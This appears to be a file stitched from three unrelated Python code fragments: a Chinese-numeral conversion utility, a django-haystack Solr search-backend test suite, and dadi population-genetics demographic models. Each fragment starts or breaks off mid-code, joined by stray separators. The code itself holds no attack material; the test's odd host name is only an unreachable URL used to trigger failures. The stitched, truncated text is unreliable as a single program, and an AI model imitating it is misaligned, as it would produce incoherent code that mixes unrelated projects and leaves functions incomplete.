def __init__(self, value, simplified, traditional, big_s, big_t, alt_s=None, alt_t=None):
super(ChineseNumberDigi, self).__init__(simplified, traditional)
self.value = value
self.big_s = big_s
self.big_t = big_t
self.alt_s = alt_s
self.alt_t = alt_t
def __str__(self):
return str(self.value)
@classmethod
def create(cls, i, v):
return ChineseNumberDigi(i, v[0], v[1], v[2], v[3])
class ChineseMath(ChineseChar):
def __init__(self, simplified, traditional, symbol, expression=None):
super(ChineseMath, self).__init__(simplified, traditional)
self.symbol = symbol
self.expression = expression
self.big_s = simplified
self.big_t = traditional
CC, CNU, CND, CM = ChineseChar, ChineseNumberUnit, ChineseNumberDigi, ChineseMath
class CountingSystem(object):
pass
class MathSymbols(object):
"""
Math symbols used in a Chinese number counting system (for both traditional and simplified Chinese), e.g.
positive = ['正', '正']
negative = ['负', '負']
point = ['点', '點']
"""
def __init__(self, positive, negative, point):
self.positive = positive
self.negative = negative
self.point = point
def __iter__(self):
for v in self.__dict__.values():
yield v
if 'create systems': # for code folding
def create_system(numbering_type=NUMBERING_TYPES[1]):
"""
Create a numbering system depends on the numbering system type.
NUMBERING_TYPES = ['low', 'mid', 'high']: Chinese numbering system type.
low: '兆' = '亿' * '十' = $10^{9}$, '京' = '兆' * '十', etc.
mid: '兆' = '亿' * '万' = $10^{12}$, '京' = '兆' * '万', etc.
high: '兆' = '亿' * '亿' = $10^{16}$, '京' = '兆' * '兆', etc.
Returns a number counting system.
"""
# chinese number units of '亿' and larger
all_larger_units = zip(
LARGER_CHINESE_NUMERING_UNITS_SIMPLIFIED, LARGER_CHINESE_NUMERING_UNITS_TRADITIONAL)
larger_units = [CNU.create(i, v, numbering_type, False)
for i, v in enumerate(all_larger_units)]
# chinese number units of '十, 百, 千, 万'
all_smaller_units = zip(
SMALLER_CHINESE_NUMERING_UNITS_SIMPLIFIED, SMALLER_CHINESE_NUMERING_UNITS_TRADITIONAL)
smaller_units = [CNU.create(i, v, small_unit=True)
for i, v in enumerate(all_smaller_units)]
# digis
chinese_digis = zip(CHINESE_DIGIS, CHINESE_DIGIS,
BIG_CHINESE_DIGIS_SIMPLIFIED, BIG_CHINESE_DIGIS_TRADITIONAL)
digits = [CND.create(i, v) for i, v in enumerate(chinese_digis)]
digits[0].alt_s, digits[0].alt_t = ZERO_ALT, ZERO_ALT
digits[2].alt_s, digits[2].alt_t = TWO_ALTS[0], TWO_ALTS[1]
positive_cn = CM(POSITIVE[0], POSITIVE[1], '+', lambda x: x)
negative_cn = CM(NEGATIVE[0], NEGATIVE[1], '-', lambda x: -x)
point_cn = CM(POINT[0], POINT[1], '.', lambda x,
y: float(str(x) + '.' + str(y)))
system = CountingSystem()
system.units = smaller_units + larger_units
system.digits = digits
system.math = MathSymbols(positive_cn, negative_cn, point_cn)
return system
def cn2num(chinese_string, numbering_type=NUMBERING_TYPES[1]):
def get_symbol(char, system):
for u in system.units:
if char in [u.traditional, u.simplified, u.big_s, u.big_t]:
return u
for d in system.digits:
if char in [d.traditional, d.simplified, d.big_s, d.big_t, d.alt_s, d.alt_t]:
return d
for m in system.math:
if char in [m.traditional, m.simplified]:
return m
def string2symbols(chinese_string, system):
int_string, dec_string = chinese_string, ''
for p in [system.math.point.simplified, system.math.point.traditional]:
if p in chinese_string:
int_string, dec_string = chinese_string.split(p)
break
return [get_symbol(c, system) for c in int_string], \
[get_symbol(c, system) for c in dec_string]
def correct_symbols(integer_symbols, system):
"""
一百八 to 一百八十
一亿一千三百万 to 一亿 一千万 三百万
"""
if integer_symbols and isinstance(integer_symbols[0], CNU):
if integer_symbols[0].power == 1:
integer_symbols = [system.digits[1]] + integer_symbols
if len(integer_symbols) > 1:
if isinstance(integer_symbols[-1], CND) and isinstance(integer_symbols[-2], CNU):
integer_symbols.append(
CNU(integer_symbols[-2].power - 1, None, None, None, None))
result = []
unit_count = 0
for s in integer_symbols:
if isinstance(s, CND):
result.append(s)
unit_count = 0
elif isinstance(s, CNU):
current_unit = CNU(s.power, None, None, None, None)
unit_count += 1
if unit_count == 1:
result.append(current_unit)
elif unit_count > 1:
for i in range(len(result)):
if isinstance(result[-i - 1], CNU) and result[-i - 1].power < current_unit.power:
result[-i - 1] = CNU(result[-i - 1].power +
current_unit.power, None, None, None, None)
return result
def compute_value(integer_symbols):
"""
Compute the value.
When current unit is larger than previous unit, current unit * all previous units will be used as all previous units.
e.g. '两千万' = 2000 * 10000 not 2000 + 10000
"""
value = [0]
last_power = 0
for s in integer_symbols:
if isinstance(s, CND):
value[-1] = s.value
elif isinstance(s, CNU):
value[-1] *= pow(10, s.power)
if s.power > last_power:
value[:-1] = list(map(lambda v: v *
pow(10, s.power), value[:-1]))
last_power = s.power
value.append(0)
return sum(value)
system = create_system(numbering_type)
int_part, dec_part = string2symbols(chinese_string, system)
int_part = correct_symbols(int_part, system)
int_value = compute_value(int_part)
dec_str = ''.join([str(d.value) for d in dec_part])
if dec_part:
return float('{0}.{1}'.format(str(int_value), dec_str))
else:
return int_value
def num2cn(num_str, numbering_type=NUMBERING_TYPES[0], big=False, traditional=False, alt_zero=False, alt_two=True, use_zeros=True, use_units=True):
def get_value(value_string, use_zeros=True):
striped_string = value_string.lstrip('0')
# record nothing if all zeros
if not striped_string:
return []
# record one digits
elif len(striped_string) == 1:
if use_zeros and len(value_string) != len(striped_string):
return [system.digits[0], system.digits[int(striped_string)]]
else:
return [system.digits[int(striped_string)]]
# recursively record multiple digits
else:
result_unit = next(u for u in reversed(
system.units) if u.power < len(striped_string))
result_string = value_string[:-result_unit.power]
return get_value(result_string) + [result_unit] + get_value(striped_string[-result_unit.power:])
system = create_system(numbering_type)
int_dec = num_str.split('.')
if len(int_dec) == 1:
int_string = int_dec[0]
dec_string = ""
elif len(int_dec) == 2:
int_string = int_dec[0]
dec_string = int_dec[1]
else:
raise ValueError(
"invalid input num string with more than one dot: {}".format(num_str))
if use_units and len(int_string) > 1:
result_symbols = get_value(int_string)
else:
result_symbols = [system.digits[int(c)] for c in int_string]
dec_symbols = [system.digits[int(c)] for c in dec_string]
if dec_string:
result_symbols += [system.math.point] + dec_symbols
if alt_two:
liang = CND(2, system.digits[2].alt_s, system.digits[2].alt_t,
system.digits[2].big_s, system.digits[2].big_t)
for i, v in enumerate(result_symbols):
if isinstance(v, CND) and v.value == 2:
next_symbol = result_symbols[i +
1] if i < len(result_symbols) - 1 else None
previous_symbol = result_symbols[i - 1] if i > 0 else None
if isinstance(next_symbol, CNU) and isinstance(previous_symbol, (CNU, type(None))):
if next_symbol.power != 1 and ((previous_symbol is None) or (previous_symbol.power != 1)):
result_symbols[i] = liang
# if big is True, '两' will not be used and `alt_two` has | |
<reponame>kezabelle/django-haystack<gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
import datetime
from decimal import Decimal
import os
import logging as std_logging
from mock import patch
import pysolr
from django.conf import settings
from django.test import TestCase
from haystack import connections, reset_search_queries
from haystack import indexes
from haystack.inputs import AutoQuery, AltParser, Raw
from haystack.models import SearchResult
from haystack.query import SearchQuerySet, RelatedSearchQuerySet, SQ
from haystack.utils.loading import UnifiedIndex
from core.models import (MockModel, AnotherMockModel,
AFourthMockModel, ASixthMockModel)
from core.tests.mocks import MockSearchResult
test_pickling = True
try:
import cPickle as pickle
except ImportError:
try:
import pickle
except ImportError:
test_pickling = False
def clear_solr_index():
# Wipe it clean.
print('Clearing out Solr...')
raw_solr = pysolr.Solr(settings.HAYSTACK_CONNECTIONS['default']['URL'])
raw_solr.delete(q='*:*')
class SolrMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
name = indexes.CharField(model_attr='author', faceted=True)
pub_date = indexes.DateField(model_attr='pub_date')
def get_model(self):
return MockModel
class SolrMaintainTypeMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
month = indexes.CharField(indexed=False)
pub_date = indexes.DateField(model_attr='pub_date')
def prepare_month(self, obj):
return "%02d" % obj.pub_date.month
def get_model(self):
return MockModel
class SolrMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='foo', document=True)
name = indexes.CharField(model_attr='author')
pub_date = indexes.DateField(model_attr='pub_date')
def get_model(self):
return MockModel
class SolrAnotherMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
name = indexes.CharField(model_attr='author')
pub_date = indexes.DateField(model_attr='pub_date')
def get_model(self):
return AnotherMockModel
def prepare_text(self, obj):
return u"You might be searching for the user %s" % obj.author
class SolrBoostMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(
document=True, use_template=True,
template_name='search/indexes/core/mockmodel_template.txt'
)
author = indexes.CharField(model_attr='author', weight=2.0)
editor = indexes.CharField(model_attr='editor')
pub_date = indexes.DateField(model_attr='pub_date')
def get_model(self):
return AFourthMockModel
class SolrRoundTripSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, default='')
name = indexes.CharField()
is_active = indexes.BooleanField()
post_count = indexes.IntegerField()
average_rating = indexes.FloatField()
price = indexes.DecimalField()
pub_date = indexes.DateField()
created = indexes.DateTimeField()
tags = indexes.MultiValueField()
sites = indexes.MultiValueField()
def get_model(self):
return MockModel
def prepare(self, obj):
prepped = super(SolrRoundTripSearchIndex, self).prepare(obj)
prepped.update({
'text': 'This is some example text.',
'name': '<NAME>',
'is_active': True,
'post_count': 25,
'average_rating': 3.6,
'price': Decimal('24.99'),
'pub_date': datetime.date(2009, 11, 21),
'created': datetime.datetime(2009, 11, 21, 21, 31, 00),
'tags': ['staff', 'outdoor', 'activist', 'scientist'],
'sites': [3, 5, 1],
})
return prepped
class SolrComplexFacetsMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, default='')
name = indexes.CharField(faceted=True)
is_active = indexes.BooleanField(faceted=True)
post_count = indexes.IntegerField()
post_count_i = indexes.FacetIntegerField(facet_for='post_count')
average_rating = indexes.FloatField(faceted=True)
pub_date = indexes.DateField(faceted=True)
created = indexes.DateTimeField(faceted=True)
sites = indexes.MultiValueField(faceted=True)
def get_model(self):
return MockModel
class SolrAutocompleteMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='foo', document=True)
name = indexes.CharField(model_attr='author')
pub_date = indexes.DateField(model_attr='pub_date')
text_auto = indexes.EdgeNgramField(model_attr='foo')
name_auto = indexes.EdgeNgramField(model_attr='author')
def get_model(self):
return MockModel
class SolrSpatialSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='name', document=True)
location = indexes.LocationField()
def prepare_location(self, obj):
return "%s,%s" % (obj.lat, obj.lon)
def get_model(self):
return ASixthMockModel
class SolrQuotingMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
def get_model(self):
return MockModel
def prepare_text(self, obj):
return u"""Don't panic but %s has been iñtërnâtiônàlizéð""" % obj.author
class SolrSearchBackendTestCase(TestCase):
def setUp(self):
super(SolrSearchBackendTestCase, self).setUp()
# Wipe it clean.
self.raw_solr = pysolr.Solr(settings.HAYSTACK_CONNECTIONS['default']['URL'])
clear_solr_index()
# Stow.
self.old_ui = connections['default'].get_unified_index()
self.ui = UnifiedIndex()
self.smmi = SolrMockSearchIndex()
self.smtmmi = SolrMaintainTypeMockSearchIndex()
self.ui.build(indexes=[self.smmi])
connections['default']._index = self.ui
self.sb = connections['default'].get_backend()
self.sq = connections['default'].get_query()
self.sample_objs = []
for i in range(1, 4):
mock = MockModel()
mock.id = i
mock.author = 'daniel%s' % i
mock.pub_date = datetime.date(2009, 2, 25) - datetime.timedelta(days=i)
self.sample_objs.append(mock)
def tearDown(self):
connections['default']._index = self.old_ui
super(SolrSearchBackendTestCase, self).tearDown()
def test_non_silent(self):
bad_sb = connections['default'].backend('bad', URL='http://omg.wtf.bbq:1000/solr', SILENTLY_FAIL=False, TIMEOUT=1)
try:
bad_sb.update(self.smmi, self.sample_objs)
self.fail()
except:
pass
try:
bad_sb.remove('core.mockmodel.1')
self.fail()
except:
pass
try:
bad_sb.clear()
self.fail()
except:
pass
try:
bad_sb.search('foo')
self.fail()
except:
pass
def test_update(self):
self.sb.update(self.smmi, self.sample_objs)
results = self.raw_solr.search('*:*')
for result in results:
del result['_version_']
# Check what Solr thinks is there.
self.assertEqual(results.hits, 3)
self.assertEqual(results.docs, [
{
'django_id': '1',
'django_ct': 'core.mockmodel',
'name': 'daniel1',
'name_exact': 'daniel1',
'text': 'Indexed!\n1',
'pub_date': '2009-02-24T00:00:00Z',
'id': 'core.mockmodel.1'
},
{
'django_id': '2',
'django_ct': 'core.mockmodel',
'name': 'daniel2',
'name_exact': 'daniel2',
'text': 'Indexed!\n2',
'pub_date': '2009-02-23T00:00:00Z',
'id': 'core.mockmodel.2'
},
{
'django_id': '3',
'django_ct': 'core.mockmodel',
'name': 'daniel3',
'name_exact': 'daniel3',
'text': 'Indexed!\n3',
'pub_date': '2009-02-22T00:00:00Z',
'id': 'core.mockmodel.3'
}
])
def test_remove(self):
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.remove(self.sample_objs[0])
results = self.raw_solr.search('*:*')
for result in results:
del result['_version_']
self.assertEqual(results.hits, 2)
self.assertEqual(results.docs, [
{
'django_id': '2',
'django_ct': 'core.mockmodel',
'name': 'daniel2',
'name_exact': 'daniel2',
'text': 'Indexed!\n2',
'pub_date': '2009-02-23T00:00:00Z',
'id': 'core.mockmodel.2'
},
{
'django_id': '3',
'django_ct': 'core.mockmodel',
'name': 'daniel3',
'name_exact': 'daniel3',
'text': 'Indexed!\n3',
'pub_date': '2009-02-22T00:00:00Z',
'id': 'core.mockmodel.3'
}
])
def test_clear(self):
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.clear()
self.assertEqual(self.raw_solr.search('*:*').hits, 0)
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.clear([AnotherMockModel])
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.clear([MockModel])
self.assertEqual(self.raw_solr.search('*:*').hits, 0)
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.clear([AnotherMockModel, MockModel])
self.assertEqual(self.raw_solr.search('*:*').hits, 0)
def test_search(self):
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.assertEqual(self.sb.search(''), {'hits': 0, 'results': []})
self.assertEqual(self.sb.search('*:*')['hits'], 3)
self.assertEqual([result.pk for result in self.sb.search('*:*')['results']], ['1', '2', '3'])
self.assertEqual(self.sb.search('', highlight=True), {'hits': 0, 'results': []})
self.assertEqual(self.sb.search('Index', highlight=True)['hits'], 3)
self.assertEqual([result.highlighted['text'][0] for result in self.sb.search('Index', highlight=True)['results']], ['<em>Indexed</em>!\n1', '<em>Indexed</em>!\n2', '<em>Indexed</em>!\n3'])
self.assertEqual(self.sb.search('Indx')['hits'], 0)
self.assertEqual(self.sb.search('indax')['spelling_suggestion'], 'index')
self.assertEqual(self.sb.search('Indx', spelling_query='indexy')['spelling_suggestion'], 'index')
self.assertEqual(self.sb.search('', facets={'name': {}}), {'hits': 0, 'results': []})
results = self.sb.search('Index', facets={'name': {}})
self.assertEqual(results['hits'], 3)
self.assertEqual(results['facets']['fields']['name'], [('daniel1', 1), ('daniel2', 1), ('daniel3', 1)])
self.assertEqual(self.sb.search('', date_facets={'pub_date': {'start_date': datetime.date(2008, 2, 26), 'end_date': datetime.date(2008, 3, 26), 'gap_by': 'month', 'gap_amount': 1}}), {'hits': 0, 'results': []})
results = self.sb.search('Index', date_facets={'pub_date': {'start_date': datetime.date(2008, 2, 26), 'end_date': datetime.date(2008, 3, 26), 'gap_by': 'month', 'gap_amount': 1}})
self.assertEqual(results['hits'], 3)
# DRL_TODO: Correct output but no counts. Another case of needing better test data?
# self.assertEqual(results['facets']['dates']['pub_date'], {'end': '2008-02-26T00:00:00Z', 'gap': '/MONTH'})
self.assertEqual(self.sb.search('', query_facets=[('name', '[* TO e]')]), {'hits': 0, 'results': []})
results = self.sb.search('Index', query_facets=[('name', '[* TO e]')])
self.assertEqual(results['hits'], 3)
self.assertEqual(results['facets']['queries'], {'name:[* TO e]': 3})
self.assertEqual(self.sb.search('', stats={}), {'hits':0,'results':[]})
results = self.sb.search('*:*', stats={'name':['name']})
self.assertEqual(results['hits'], 3)
self.assertEqual(results['stats']['name']['count'], 3)
self.assertEqual(self.sb.search('', narrow_queries=set(['name:daniel1'])), {'hits': 0, 'results': []})
results = self.sb.search('Index', narrow_queries=set(['name:daniel1']))
self.assertEqual(results['hits'], 1)
# Ensure that swapping the ``result_class`` works.
self.assertTrue(isinstance(self.sb.search(u'index document', result_class=MockSearchResult)['results'][0], MockSearchResult))
# Check the use of ``limit_to_registered_models``.
self.assertEqual(self.sb.search('', limit_to_registered_models=False), {'hits': 0, 'results': []})
self.assertEqual(self.sb.search('*:*', limit_to_registered_models=False)['hits'], 3)
self.assertEqual([result.pk for result in self.sb.search('*:*', limit_to_registered_models=False)['results']], ['1', '2', '3'])
# Stow.
old_limit_to_registered_models = getattr(settings, 'HAYSTACK_LIMIT_TO_REGISTERED_MODELS', True)
settings.HAYSTACK_LIMIT_TO_REGISTERED_MODELS = False
self.assertEqual(self.sb.search(''), {'hits': 0, 'results': []})
self.assertEqual(self.sb.search('*:*')['hits'], 3)
self.assertEqual([result.pk for result in self.sb.search('*:*')['results']], ['1', '2', '3'])
# Restore.
settings.HAYSTACK_LIMIT_TO_REGISTERED_MODELS = old_limit_to_registered_models
def test_altparser_query(self):
self.sb.update(self.smmi, self.sample_objs)
results = self.sb.search(AltParser('dismax', "daniel1", qf='name', mm=1).prepare(self.sq))
self.assertEqual(results['hits'], 1)
# This should produce exactly the same result since all we have are mockmodel instances but we simply
# want to confirm that using the AltParser doesn't break other options:
results = self.sb.search(AltParser('dismax', 'daniel1', qf='name', mm=1).prepare(self.sq),
narrow_queries=set(('django_ct:core.mockmodel', )))
self.assertEqual(results['hits'], 1)
results = self.sb.search(AltParser('dismax', '+indexed +daniel1', qf='text name', mm=1).prepare(self.sq))
self.assertEqual(results['hits'], 1)
self.sq.add_filter(SQ(name=AltParser('dismax', 'daniel1', qf='name', mm=1)))
self.sq.add_filter(SQ(text='indexed'))
new_q = self.sq._clone()
new_q._reset()
new_q.add_filter(SQ(name='daniel1'))
new_q.add_filter(SQ(text=AltParser('dismax', 'indexed', qf='text')))
results = new_q.get_results()
self.assertEqual(len(results), 1)
self.assertEqual(results[0].id, 'core.mockmodel.1')
def test_raw_query(self):
self.sb.update(self.smmi, self.sample_objs)
# Ensure that the raw bits have proper parenthesis.
new_q = self.sq._clone()
new_q._reset()
new_q.add_filter(SQ(content=Raw("{!dismax qf='title^2 text' mm=1}my query")))
results = new_q.get_results()
self.assertEqual(len(results), 0)
def test_altparser_quoting(self):
test_objs = [
MockModel(id=1, author="<NAME>", pub_date=datetime.date.today()),
MockModel(id=2, author="<NAME>", pub_date=datetime.date.today()),
]
self.sb.update(SolrQuotingMockSearchIndex(), test_objs)
results = self.sb.search(AltParser('dismax', "+don't +quuz", qf='text').prepare(self.sq))
self.assertEqual(results['hits'], 1)
def test_more_like_this(self):
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
# A functional MLT example with enough data to work is below. Rely on
# this to ensure the API is correct enough.
self.assertEqual(self.sb.more_like_this(self.sample_objs[0])['hits'], 0)
self.assertEqual([result.pk for result in self.sb.more_like_this(self.sample_objs[0])['results']], [])
def test_build_schema(self):
old_ui = connections['default'].get_unified_index()
(content_field_name, fields) = self.sb.build_schema(old_ui.all_searchfields())
self.assertEqual(content_field_name, 'text')
self.assertEqual(len(fields), 4)
self.assertEqual(sorted(fields, key=lambda x: x['field_name']), [
{
'indexed': 'true',
'type': 'text_en',
'stored': 'true',
'field_name': 'name',
'multi_valued': 'false'
},
{
'indexed': 'true',
'field_name': 'name_exact',
'stored': 'true',
'type': 'string',
'multi_valued': 'false'
},
{
'indexed': 'true',
'type': 'date',
'stored': 'true',
'field_name': 'pub_date',
'multi_valued': 'false'
},
{
'indexed': 'true',
'type': 'text_en',
'stored': 'true',
'field_name': 'text',
'multi_valued': 'false'
},
])
ui = UnifiedIndex()
ui.build(indexes=[SolrComplexFacetsMockSearchIndex()])
(content_field_name, fields) = self.sb.build_schema(ui.all_searchfields())
self.assertEqual(content_field_name, 'text')
self.assertEqual(len(fields), 15)
fields = sorted(fields, key=lambda field: field['field_name'])
self.assertEqual(fields, [
{
'field_name': 'average_rating',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'float'
},
{
'field_name': 'average_rating_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'float'
},
{
'field_name': 'created',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'date'
},
{
'field_name': 'created_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'date'
},
{
'field_name': 'is_active',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'boolean'
},
{
'field_name': 'is_active_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'boolean'
},
{
'field_name': 'name',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'text_en'
},
{
'field_name': 'name_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'string'
},
{
'field_name': 'post_count',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'long'
},
{
'field_name': 'post_count_i',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'long'
},
{
'field_name': 'pub_date',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'date'
},
{
'field_name': 'pub_date_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'date'
},
{
'field_name': 'sites',
'indexed': 'true',
'multi_valued': 'true',
'stored': 'true',
'type': 'text_en'
},
{
'field_name': | |
in each population and set the migration rates to me12 & me21
phiI = dadi.Integration.two_pops(phiI, xx, Tam, nu1, nu2, m12=me12, m21=me21)
# We keep the population sizes change after ancient migration to bnu1_func and bnu2_func and set the migration rates to zero
phiI = dadi.Integration.two_pops(phiI, xx, Ts, bnu1_func, bnu2_func, m12=0, m21=0)
###
## calculate the spectrum.
# oriented
fsIO = dadi.Spectrum.from_phi(phiI, (n1,n2), (xx,xx))
# mis-oriented
fsIM = dadi.Numerics.reverse_array(fsIO)
#### Calculate the pectrum in normally-recombining regions
# phi for the equilibrium ancestral population
phinr = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
phinr = dadi.PhiManip.phi_1D_to_2D(xx, phinr)
# We set the population sizes after the split to nu1 and nu2 and the migration rates to m12 and m21
phinr = dadi.Integration.two_pops(phinr, xx, Tam, nu1, nu2, m12=m12, m21=m21)
# We keep the population sizes after the split to nu1 and nu2 and set the migration rates to zero
phinr = dadi.Integration.two_pops(phinr, xx, Ts, bnu1_func, bnu2_func, m12=0, m21=0)
###
## calculate the spectrum.
# oriented
fsnrO = dadi.Spectrum.from_phi(phinr, (n1,n2), (xx,xx))
# mis-oriented
fsnrM = dadi.Numerics.reverse_array(fsnrO)
#### Spectrum of low-recombining regions
# phi for the equilibrium ancestral population
philr = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
philr = dadi.PhiManip.phi_1D_to_2D(xx, philr)
# We set the population sizes after the split to hrf*nu1 and hrf*nu2 and the migration rates to me12 and me21
philr = dadi.Integration.two_pops(philr, xx, Tam, nu1*hrf, nu2*hrf, m12=m12, m21=m21)
# We set the population sizes after the split to hrf*bnu1_func and hrf*bnu2_func and set the migration rates to zero
bnu1hrf_func = lambda t: (nu1 * b1**(t/Ts)) * hrf
bnu2hrf_func = lambda t: (nu2 * b2**(t/Ts)) * hrf
philr = dadi.Integration.two_pops(philr, xx, Ts, bnu1hrf_func, bnu2hrf_func, m12=0, m21=0)
###
## calculate the spectrum.
# oriented
fslrO = dadi.Spectrum.from_phi(philr, (n1,n2), (xx,xx))
# mis-oriented
fslrM = dadi.Numerics.reverse_array(fslrO)
#### Sum the spectra
fs = O*(P*fsNO + (1-P)*fsIO + (1-Q)*fsnrO + Q*fslrO) + (1-O)*(P*fsNM + (1-P)*fsIM + (1-Q)*fsnrM + Q*fslrM)
return fs
def PAM(params, (n1,n2), pts):
nu1, nu2, m12, m21, Ts, Tam, O = params
"""
Model with split, followed by two periods of ancient migration
nu1: Size of population 1 after split.
nu2: Size of population 2 after split.
m12: Migration from pop 2 to pop 1 (2*Na*m12).
m21: Migration from pop 1 to pop 2.
Ts: The scaled time between the split and the ancient migration (in units of 2*Na generations).
Tam: The scale time between the ancient migration and present.
n1,n2: Size of fs to generate.
O: The proportion of accurate orientation
pts: Number of points to use in grid for evaluation.
"""
# Define the grid we'll use
xx = dadi.Numerics.default_grid(pts)
# phi for the equilibrium ancestral population
phi = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
# We set the population sizes after the split to nu1 and nu2 and the migration rate to m12 and m21
phi = dadi.Integration.two_pops(phi, xx, Ts, nu1, nu2, m12=m12, m21=m21)
# We keep the population sizes after the split to nu1 and nu2 and set the migration rates to zero
phi = dadi.Integration.two_pops(phi, xx, Tam, nu1, nu2, m12=0, m21=0)
# We set the population sizes after the split to nu1 and nu2 and the migration rate to m12 and m21
phi = dadi.Integration.two_pops(phi, xx, Ts, nu1, nu2, m12=m12, m21=m21)
# We keep the population sizes after the split to nu1 and nu2 and set the migration rates to zero
phi = dadi.Integration.two_pops(phi, xx, Tam, nu1, nu2, m12=0, m21=0)
# Finally, calculate the spectrum.
# oriented
fsO = dadi.Spectrum.from_phi(phi, (n1,n2), (xx,xx))
# mis-oriented
fsM = dadi.Numerics.reverse_array(fsO)
### Sum the two spectra in proportion O
fs = O*fsO+(1-O)*fsM
return fs
def SC(params, (n1,n2), pts):
nu1, nu2, m12, m21, Ts, Tsc, O = params
"""
Model with split, complete isolation, followed by secondary contact
nu1: Size of population 1 after split.
nu2: Size of population 2 after split.
m12: Migration from pop 2 to pop 1 (2*Na*m12).
m21: Migration from pop 1 to pop 2.
Ts: The scaled time between the split and the secondary contact (in units of 2*Na generations).
Tsc: The scale time between the secondary contact and present.
n1,n2: Size of fs to generate.
O: The proportion of accurate orientation
pts: Number of points to use in grid for evaluation.
"""
# Define the grid we'll use
xx = dadi.Numerics.default_grid(pts)
# phi for the equilibrium ancestral population
phi = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
# We set the population sizes after the split to nu1 and nu2 and the migration rate to zero
phi = dadi.Integration.two_pops(phi, xx, Ts, nu1, nu2, m12=0, m21=0)
# We keep the population sizes after the split to nu1 and nu2 and set the migration rates to m12 and m21
phi = dadi.Integration.two_pops(phi, xx, Tsc, nu1, nu2, m12=m12, m21=m21)
# Finally, calculate the spectrum.
# oriented
fsO = dadi.Spectrum.from_phi(phi, (n1,n2), (xx,xx))
# mis-oriented
fsM = dadi.Numerics.reverse_array(fsO)
### Sum the two spectra in proportion O
fs = O*fsO+(1-O)*fsM
return fs
def SC2N(params, (n1,n2), pts):
nu1, nu2, hrf, m12, m21, Ts, Tsc, Q, O = params
"""
Model of semi permeability with split, complete isolation, followed by secondary contact with 2 migration rates
nu1: Size of population 1 after split.
nu2: Size of population 2 after split.
hrf: Hill-Robertson factor, i.e. the degree to which Ne is locally reduced due to the effects of background selection and selective sweep effects
m12: Migration from pop 2 to pop 1 (2*Na*m12).
m21: Migration from pop 1 to pop 2.
Ts: The scaled time between the split and the secondary contact (in units of 2*Na generations).
Tsc: The scale time between the secondary contact and present.
Q: The proportion of the genome with a reduced effective size due to selection at linked sites
O: The proportion of accurate orientation
n1,n2: Size of fs to generate.
pts: Number of points to use in grid for evaluation.
"""
# Define the grid we'll use
xx = dadi.Numerics.default_grid(pts)
#### Calculate the spectrum in normally-recombining regions
# phi for the equilibrium ancestral population
phinr = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
phinr = dadi.PhiManip.phi_1D_to_2D(xx, phinr)
# We set the population sizes after the split and isolation to nu1 and nu2 and set the migration rates to zero
phinr = dadi.Integration.two_pops(phinr, xx, Ts, nu1, nu2, m12=0, m21=0)
# We keep the population sizes after the split and isolation to nu1 and nu2 and set the migration rates to zero
phinr = dadi.Integration.two_pops(phinr, xx, Tsc, nu1, nu2, m12=m12, m21=m21)
###
## calculate the spectrum.
# oriented
fsnrO = dadi.Spectrum.from_phi(phinr, (n1,n2), (xx,xx))
# mis-oriented
fsnrM = dadi.Numerics.reverse_array(fsnrO)
#### Spectrum of low-recombining regions
# phi for the equilibrium ancestral population
philr = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
philr = dadi.PhiManip.phi_1D_to_2D(xx, philr)
# We set the population sizes after the split and isolation to nu1 and nu2 and set the migration rates to zero
philr = dadi.Integration.two_pops(philr, xx, Ts, nu1*hrf, nu2*hrf, m12=0, m21=0)
# We keep the population sizes after the split and isolation to nu1 and nu2 and set the migration rate to m12 and m21
philr = dadi.Integration.two_pops(philr, xx, Tsc, nu1*hrf, nu2*hrf, m12=m12, m21=m21)
###
## calculate the spectrum.
# oriented
fslrO = dadi.Spectrum.from_phi(philr, (n1,n2), (xx,xx))
# mis-oriented
